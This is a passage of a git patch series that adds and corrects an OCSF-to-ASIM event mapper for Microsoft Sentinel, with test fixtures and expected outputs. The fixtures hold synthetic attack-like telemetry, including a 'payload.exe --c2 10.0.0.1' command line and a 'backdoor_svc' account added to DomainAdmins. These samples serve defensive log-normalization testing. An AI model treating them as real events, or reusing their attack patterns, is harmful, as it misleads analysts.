"Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dhcp1", + }, + src_endpoint: { + hostname: "client1", + ip: 10.0.0.50, + mac_addr: "00:11:22:33:44:55", + }, +}, { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + url: { + url_string: "https://example.org/index.html", + }, + http_request: { + http_method: "GET", + }, + http_response: { + code: 200, + }, +} +microsoft::ocsf::map_to_asim +name = @name +sort EventOriginalUid +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?, + TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?, + TargetFileName=TargetFileName?, SrcIpAddr=SrcIpAddr?, + SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?, + DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?, + DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?, + DnsQueryClassName=DnsQueryClassName?, + EventResultDetails=EventResultDetails?, SrcHostname=SrcHostname?, + SrcMacAddr=SrcMacAddr?, Url=Url?, HttpRequestMethod=HttpRequestMethod? diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt new file mode 100644 index 0000000..cf0e400 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt @@ -0,0 +1,140 @@ +{ + name: "asim.dhcp_event", + EventSchema: "DhcpEvent", + EventSchemaVersion: "0.1.1", + EventType: "Assign", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "dhcp-1", + Dvc: "dhcp1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.50, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: "client1", + SrcMacAddr: "00:11:22:33:44:55", + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.dns", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "dns-1", + Dvc: "dns1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.1, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: "example.org", + DnsQueryTypeName: "A", + DnsQueryClassName: "IN", + EventResultDetails: "NA", + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.file_event", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileCreated", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "file-1", + Dvc: "host1", + ActorUsername: "alice", + TargetFilePath: "C:\\tmp\\payload.exe", + TargetFilePathType: "Windows Local", + TargetFileName: "payload.exe", + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.network_session", + EventSchema: "NetworkSession", + EventSchemaVersion: "0.2.7", + EventType: "Flow", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "net-1", + Dvc: "fw1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.1, + SrcPortNumber: 12345, + DstIpAddr: 10.0.0.2, + DstPortNumber: 443, + SrcBytes: 100, + DstBytes: 200, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.web_session", + EventSchema: "WebSession", + EventSchemaVersion: "0.2.7", + EventType: "HTTPsession", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "web-1", + Dvc: "proxy1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: "200", + SrcHostname: null, + SrcMacAddr: null, + Url: "https://example.org/index.html", + HttpRequestMethod: "GET", +} diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql new file mode 100644 index 0000000..a70ec48 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/process.tql @@ -0,0 +1,56 @@ +from { + activity_id: 1, + activity_name: "Launch", + category_uid: 1, + category_name: "System Activity", + class_uid: 1007, + class_name: "Process Activity", + type_uid: 100701, + type_name: "Process Activity: Launch", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4688", + original_event_uid: "98764", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + process: { + pid: 6732, + name: "payload.exe", + path: "C:\\tmp\\payload.exe", + cmd_line: "payload.exe --c2 10.0.0.1", + parent_process: { + pid: 4660, + name: "wscript.exe", + }, + }, +} +@name = "ocsf.process_activity" +microsoft::ocsf::map_to_asim +name = @name +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalType, DvcHostname, ActorUsername, + ActorUsernameType, ActorUserId, ActorUserIdType, ActingProcessId, + ParentProcessId, TargetProcessId, TargetProcessName, + TargetProcessCommandLine diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt new file mode 100644 index 0000000..299bbb6 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/process.txt @@ -0,0 +1,19 @@ +{ + name: "asim.process_event", + EventSchema: "ProcessEvent", + EventSchemaVersion: "0.1.4", + EventType: "ProcessCreated", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalType: "4688", + DvcHostname: "WINHOST01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + ActingProcessId: "4660", + ParentProcessId: "4660", + TargetProcessId: "6732", + TargetProcessName: "payload.exe", + TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", +} diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql new file mode 100644 index 0000000..1016c0b --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql @@ -0,0 +1,30 @@ +--- +error: true +--- + +from { + activity_id: 1, + activity_name: "Execute", + category_uid: 1, + class_uid: 1009, + class_name: "Script Activity", + type_uid: 100901, + type_name: "Script Activity: Execute", + time: 2024-03-23T12:34:56Z, + severity_id: 2, + metadata: { + original_event_uid: "script-1", + product: { + name: "PowerShell", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "WINHOST01", + }, +} +@name = "ocsf.script_activity" +strict { + microsoft::ocsf::map_to_asim +} diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.txt b/microsoft/tests/ocsf-to-asim/unsupported-strict.txt new file mode 100644 index 0000000..44a4da6 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.txt @@ -0,0 +1 @@ +error: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"} diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql new file mode 100644 index 0000000..a46548e --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/user-management.tql @@ -0,0 +1,86 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +}, { + activity_id: 3, + activity_name: "Add User", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3006, + class_name: "Group Management", + type_uid: 300603, + type_name: "Group Management: Add User", + time: 2024-03-23T12:34:57Z, + severity_id: 1, + metadata: { + event_code: "4728", + original_event_uid: "98776", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + group: { + domain: "CORP", + name: "DomainAdmins", + uid: "S-1-5-21-3107921522-2185401913-891411500-512", + }, + user: { + name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +} +@name = "ocsf.account_change" +microsoft::ocsf::map_to_asim +name = @name +sort EventOriginalType +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalType, DvcHostname, ActorUsername, + ActorUsernameType, TargetUsername, TargetUsernameType=TargetUsernameType?, + TargetUserId, TargetUserIdType, GroupName=GroupName?, GroupId=GroupId?, + GroupIdType=GroupIdType? diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/ocsf-to-asim/user-management.txt new file mode 100644 index 0000000..23d95e0 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/user-management.txt @@ -0,0 +1,38 @@ +{ + name: "asim.user_management", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + EventType: "UserCreated", + EventResult: "NA", + EventSeverity: "Informational", + EventOriginalType: "4720", + DvcHostname: "DC01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + TargetUsername: "CORP\\backdoor_svc", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: null, + GroupId: null, + GroupIdType: null, +} +{ + name: "asim.user_management", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + EventType: "UserAddedToGroup", + EventResult: "NA", + EventSeverity: "Informational", + EventOriginalType: "4728", + DvcHostname: "DC01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + TargetUsername: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + TargetUsernameType: null, + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: "DomainAdmins", + GroupId: "S-1-5-21-3107921522-2185401913-891411500-512", + GroupIdType: "SID", +} From 6e1707df4b3323187791a6e5fe2914efbd29905d Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Sun, 7 Jun 2026 17:23:24 +0200 Subject: [PATCH 02/27] Fix ASIM mapping correctness in OCSF mapper Address review findings against the authoritative ASIM schema data and OCSF 1.8 reference: - Map OCSF Logoff activity to EventType Logoff instead of Logon. - Read the URL from http_request.url.url_string so Url is a string, not a record, on conformant OCSF input. - Preserve the full original OCSF event under AdditionalFields instead of a fixed metadata envelope that silently dropped unmapped payload fields. - Normalize enumerated fields: ThreatCategory via lookup table with ThreatOriginalCategory, AlertVerdict to the four allowed values, Authentication EventSubType from logon_type with EventOriginalSubType, and Dns EventType from the query opcode with request/response EventSubType. - Map severity_id 6 (Fatal) to High and stop passing arbitrary severity strings into EventSeverity. - Orient rename events correctly: OCSF file becomes SrcFile* and file_result becomes TargetFile*. - Derive ParentProcessId from the acting process's parent instead of the acting process itself. - Honor OCSF start_time for EventStartTime. - Drop the explicit unsupported class list in favor of the fallback. - Make test fixtures OCSF-1.8-conformant (query.hostname, src_endpoint.mac, http_request.url) and add Logoff, rename, and logon_type coverage. Co-Authored-By: Claude Opus 4.8 (1M context) Assisted-by: Claude Opus 4.8 (Claude Code) --- .../unreleased/ocsf-to-asim-mapper.md | 3 +- microsoft/operators/ocsf/asim/common.tql | 29 +++--- microsoft/operators/ocsf/map_to_asim.tql | 88 +++++++++++++++---- microsoft/tests/ocsf-to-asim/alert.tql | 3 +- microsoft/tests/ocsf-to-asim/alert.txt | 3 +- .../tests/ocsf-to-asim/authentication.tql | 42 ++++++++- .../tests/ocsf-to-asim/authentication.txt | 30 +++++++ .../tests/ocsf-to-asim/direct-targets.tql | 47 ++++++++-- .../tests/ocsf-to-asim/direct-targets.txt | 40 +++++++++ microsoft/tests/ocsf-to-asim/process.tql | 8 ++ microsoft/tests/ocsf-to-asim/process.txt | 2 +- 11 files changed, 245 insertions(+), 50 deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index c7c3730..8655ed3 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -12,4 +12,5 @@ validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for -file, network, DNS, DHCP, and web session ASIM schemas. +file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF +event is preserved under `AdditionalFields` so no source data is lost. diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/ocsf/asim/common.tql index 60d18d7..441db8f 100644 --- a/microsoft/operators/ocsf/asim/common.tql +++ b/microsoft/operators/ocsf/asim/common.tql @@ -5,7 +5,7 @@ description: Initializes shared ASIM fields from a validated OCSF event. asim = {} asim.EventCount = 1 -asim.EventStartTime = time +asim.EventStartTime = start_time? else time asim.EventEndTime = end_time? else time asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown" asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft" @@ -40,13 +40,20 @@ match severity_id? { asim.EventSeverity = "High" asim.EventOriginalSeverity = severity? else "Critical" } - _ if severity? == "Critical" => { + 6 => { + asim.EventSeverity = "High" + asim.EventOriginalSeverity = severity? else "Fatal" + } + _ if severity? == "Critical" or severity? == "Fatal" => { asim.EventSeverity = "High" asim.EventOriginalSeverity = severity } - _ if severity? != null => { + _ if severity? in ["Informational", "Low", "Medium", "High"] => { asim.EventSeverity = severity } + _ if severity? != null => { + asim.EventOriginalSeverity = severity + } _ => {} } @@ -105,19 +112,3 @@ if disposition? != null { if action? != null { asim.DvcAction = action } - -asim.AdditionalFields = { - category_uid: category_uid?, - category_name: category_name?, - class_uid: class_uid?, - class_name: class_name?, - activity_id: activity_id?, - activity_name: activity_name?, - type_uid: type_uid?, - type_name: type_name?, - metadata: metadata?, - cloud: cloud?, - unmapped: unmapped?, - raw_data: raw_data?, - raw_data_size: raw_data_size?, -} diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql index 03283d7..78c01ef 100644 --- a/microsoft/operators/ocsf/map_to_asim.tql +++ b/microsoft/operators/ocsf/map_to_asim.tql @@ -2,6 +2,21 @@ description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event. --- +let $threat_categories = { + adware: "Adware", + cryptominer: "Cryptominor", + malware: "Malware", + phishing: "Phishing", + ransomware: "Ransomware", + rootkit: "Rootkit", + spam: "Spam", + spoofing: "Spoofing", + spyware: "Spyware", + trojan: "Trojan", + virus: "Virus", + worm: "Worm", +} + microsoft::ocsf::asim::common match class_uid { @@ -17,7 +32,12 @@ match class_uid { asim.EventReportUrl = finding_info?.url? else null asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat" asim.ThreatName = malware?[0]?.name? else finding_info?.title? - asim.ThreatCategory = finding_info?.types?[0]? else compliance?.status? + if class_uid == 2003 { + asim.ThreatCategory = "Security Policy Violation" + } else { + asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? + } + asim.ThreatOriginalCategory = finding_info?.types?[0]? asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? asim.UserId = user?.uid? else actor?.user?.uid? asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null @@ -31,7 +51,13 @@ match class_uid { _ => {} } asim.AlertOriginalStatus = status? - asim.AlertVerdict = verdict? + match verdict? { + "True Positive" => { asim.AlertVerdict = "True Positive" } + "False Positive" => { asim.AlertVerdict = "False Positive" } + "Benign" => { asim.AlertVerdict = "Benign Positive" } + "Unknown" => { asim.AlertVerdict = "Unknown" } + _ => {} + } } 1006 | 1008 | 3004 | 201004 => { @name = "asim.audit_event" @@ -77,8 +103,25 @@ match class_uid { @name = "asim.authentication" asim.EventSchema = "Authentication" asim.EventSchemaVersion = "0.1.4" - asim.EventType = "Elevate" if class_uid == 3003 else "Logon" - asim.EventSubType = activity_name? + match activity_name { + "Logoff" => { asim.EventType = "Logoff" } + _ => { asim.EventType = "Elevate" if class_uid == 3003 else "Logon" } + } + match logon_type? { + "System" => { asim.EventSubType = "System" } + "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { + asim.EventSubType = "Interactive" + } + "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Remote Interactive" | "Cached Remote Interactive" => { + asim.EventSubType = "RemoteInteractive" + } + "OS Service" => { asim.EventSubType = "Service" } + _ => {} + } + if logon_type? != null { + asim.EventOriginalSubType = logon_type + } asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? if actor?.user?.domain? != null and actor?.user?.name? != null { asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" @@ -176,7 +219,7 @@ match class_uid { asim.ActorUserId = actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string() - asim.ParentProcessId = process?.parent_process?.pid?.string() + asim.ParentProcessId = actor?.process?.parent_process?.pid?.string() asim.TargetProcessId = process?.pid?.string() asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1] asim.TargetProcessCommandLine = process?.cmd_line? @@ -203,10 +246,15 @@ match class_uid { } asim.ActorUserId = actor?.user?.uid? asim.TargetFilePath = file?.path? else file?.name? - asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1] - asim.SrcFilePath = file_result?.path? - asim.SrcFileName = file_result?.name? + if activity_name == "Rename" and file_result? != null { + asim.SrcFilePath = asim.TargetFilePath + asim.SrcFileName = asim.TargetFileName + asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local" + asim.TargetFilePath = file_result.path? else asim.TargetFilePath + asim.TargetFileName = file_result.name? else asim.TargetFileName + } + asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local" assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} } @@ -242,8 +290,8 @@ match class_uid { asim.EventSchema = "WebSession" asim.EventSchemaVersion = "0.2.7" asim.EventType = "HTTPsession" - asim.Url = url?.url_string? else http_request?.url? - asim.HttpRequestMethod = http_request?.http_method? else http_request?.method? else activity_name?.to_upper() + asim.Url = http_request?.url?.url_string? + asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper() asim.EventResultDetails = http_response?.code?.string() else status_code?.string() if http_response?.code? != null { asim.EventResult = "Success" if http_response.code < 400 else "Failure" @@ -254,10 +302,15 @@ match class_uid { @name = "asim.dns" asim.EventSchema = "Dns" asim.EventSchemaVersion = "0.1.7" - asim.EventType = activity_name? else "Query" - asim.DnsQuery = query?.name? else query?.hostname? else query?.value? - asim.DnsQueryTypeName = query?.type? else query?.type_name? - asim.DnsQueryClassName = query?.class? else query?.class_name? + asim.EventType = query?.opcode? else "Query" + match activity_name { + "Query" => { asim.EventSubType = "request" } + "Response" => { asim.EventSubType = "response" } + _ => {} + } + asim.DnsQuery = query?.hostname? + asim.DnsQueryTypeName = query?.type? + asim.DnsQueryClassName = query?.class? asim.EventResultDetails = rcode? else "NA" asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? @@ -277,16 +330,15 @@ match class_uid { } asim.SrcHostname = src_endpoint?.hostname? else src_endpoint?.ip?.string() asim.SrcIpAddr = src_endpoint?.ip? - asim.SrcMacAddr = src_endpoint?.mac? else src_endpoint?.mac_addr? + asim.SrcMacAddr = src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} } - 0 | 1002 | 1003 | 1004 | 1005 | 1009 | 1010 | 2001 | 2002 | 2005 | 2006 | 2007 | 2008 | 3005 | 4005 | 4006 | 4007 | 4008 | 4009 | 4010 | 4011 | 4012 | 4013 | 4014 | 5001 | 5002 | 5003 | 5004 | 5006 | 5007 | 5008 | 5009 | 5010 | 5011 | 5012 | 5013 | 5014 | 5015 | 5016 | 5017 | 5018 | 5019 | 5020 | 5021 | 5022 | 5023 | 5040 | 6001 | 6002 | 6003 | 6004 | 6005 | 6006 | 6007 | 6008 | 7001 | 7002 | 7003 | 7004 | 8001 | 8002 => { - microsoft::ocsf::asim::unsupported - } _ => { microsoft::ocsf::asim::unsupported } } +asim.AdditionalFields = {...this} +drop asim.AdditionalFields.asim this = asim diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql index 81c83a0..5a96c99 100644 --- a/microsoft/tests/ocsf-to-asim/alert.tql +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -55,5 +55,6 @@ microsoft::ocsf::map_to_asim name = @name select name, EventSchema, EventSchemaVersion, EventType, EventUid, EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, - EventSubType, ThreatName, ThreatCategory, AlertStatus, + EventSubType, ThreatName, ThreatCategory, + ThreatOriginalCategory=ThreatOriginalCategory?, AlertStatus, AlertOriginalStatus, AlertVerdict diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt index c8358c3..118437f 100644 --- a/microsoft/tests/ocsf-to-asim/alert.txt +++ b/microsoft/tests/ocsf-to-asim/alert.txt @@ -11,7 +11,8 @@ AlertName: "Suspicious PowerShell", EventSubType: "Threat", ThreatName: "Trojan", - ThreatCategory: "malware", + ThreatCategory: "Malware", + ThreatOriginalCategory: "malware", AlertStatus: "Active", AlertOriginalStatus: "New", AlertVerdict: "True Positive", diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/ocsf-to-asim/authentication.tql index e0cfa9f..2e0d03b 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.tql +++ b/microsoft/tests/ocsf-to-asim/authentication.tql @@ -13,6 +13,8 @@ from { status_id: 1, status: "Success", auth_protocol: "Kerberos", + logon_type: "Network", + logon_type_id: 3, metadata: { event_code: "4624", original_event_uid: "98761", @@ -107,14 +109,48 @@ from { factor_type_id: 5, }, ], +}, { + activity_id: 2, + activity_name: "Logoff", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3002, + class_name: "Authentication", + type_uid: 300202, + type_name: "Authentication: Logoff", + time: 2024-03-23T12:45:00Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4634", + original_event_uid: "98762", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, } @name = "ocsf.authentication" microsoft::ocsf::map_to_asim name = @name sort EventOriginalUid -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventProduct, EventVendor, EventOriginalType, - EventOriginalUid, Dvc, DvcHostname=DvcHostname?, SrcIpAddr, SrcPortNumber, +select name, EventSchema, EventSchemaVersion, EventType, + EventSubType=EventSubType?, EventOriginalSubType=EventOriginalSubType?, + EventResult, EventSeverity, EventProduct, EventVendor, EventOriginalType, + EventOriginalUid, Dvc, DvcHostname=DvcHostname?, + SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?, TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType, TargetAppName=TargetAppName?, TargetAppId=TargetAppId?, LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod? diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt index 65c3ba5..7e37af7 100644 --- a/microsoft/tests/ocsf-to-asim/authentication.txt +++ b/microsoft/tests/ocsf-to-asim/authentication.txt @@ -3,6 +3,8 @@ EventSchema: "Authentication", EventSchemaVersion: "0.1.4", EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", EventResult: "Success", EventSeverity: "Informational", EventProduct: "Microsoft-Windows-Security-Auditing", @@ -22,11 +24,39 @@ LogonProtocol: "Kerberos", LogonMethod: null, } +{ + name: "asim.authentication", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logoff", + EventSubType: null, + EventOriginalSubType: null, + EventResult: "Success", + EventSeverity: "Informational", + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalType: "4634", + EventOriginalUid: "98762", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + SrcIpAddr: null, + SrcPortNumber: null, + TargetUsername: "CORP\\jdoe", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + TargetUserIdType: "SID", + TargetAppName: null, + TargetAppId: null, + LogonProtocol: null, + LogonMethod: null, +} { name: "asim.authentication", EventSchema: "Authentication", EventSchemaVersion: "0.1.4", EventType: "Logon", + EventSubType: null, + EventOriginalSubType: null, EventResult: "Success", EventSeverity: "Informational", EventProduct: "Microsoft Entra ID", diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql index e616aef..21ca2fa 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql @@ -28,6 +28,40 @@ from { path: "C:\\tmp\\payload.exe", name: "payload.exe", }, +}, { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, }, { activity_id: 6, activity_name: "Traffic", @@ -84,7 +118,7 @@ from { hostname: "dns1", }, query: { - name: "example.org", + hostname: "example.org", type: "A", class: "IN", }, @@ -115,7 +149,7 @@ from { src_endpoint: { hostname: "client1", ip: 10.0.0.50, - mac_addr: "00:11:22:33:44:55", + mac: "00:11:22:33:44:55", }, }, { activity_id: 3, @@ -138,11 +172,11 @@ from { device: { hostname: "proxy1", }, - url: { - url_string: "https://example.org/index.html", - }, http_request: { http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, }, http_response: { code: 200, @@ -154,7 +188,8 @@ sort EventOriginalUid select name, EventSchema, EventSchemaVersion, EventType, EventResult, EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?, TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?, - TargetFileName=TargetFileName?, SrcIpAddr=SrcIpAddr?, + TargetFileName=TargetFileName?, SrcFilePath=SrcFilePath?, + SrcFileName=SrcFileName?, SrcIpAddr=SrcIpAddr?, SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?, DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?, DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?, 